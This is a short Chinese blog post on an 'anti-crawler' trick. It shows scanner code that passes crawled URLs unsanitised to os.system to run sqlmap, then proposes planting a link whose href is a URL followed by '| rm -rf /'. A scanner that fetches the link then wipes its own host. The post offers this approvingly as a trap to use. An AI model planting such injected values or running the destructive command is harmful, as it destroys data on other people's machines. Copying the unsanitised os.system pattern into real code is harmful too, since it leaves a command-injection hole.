关于反爬虫的一个思考

最近在开发一个Python的系统,在写爬虫的时候突然想到一个特别猥琐的对付使用脚本进行批量检测的一个小方法。

我们在进行批量扫描并检测的时候,都可能会调用一些系统命令,比如如下代码:

1
2
3
4
...
for i in get_new_urls:
os.system("python sqlmap.py -u %s" % i)
...

以上代码,如果我们网站的url里有下面的一个链接:

1
<a href="https://www.baidu.com | rm -rf / ">

那么脚本最后执行的命令就是:

1
os.system("python sqlmap.py -u https://www.baidu.com | rm -rf /")

所以你懂的…

大爷,赏个铜板呗!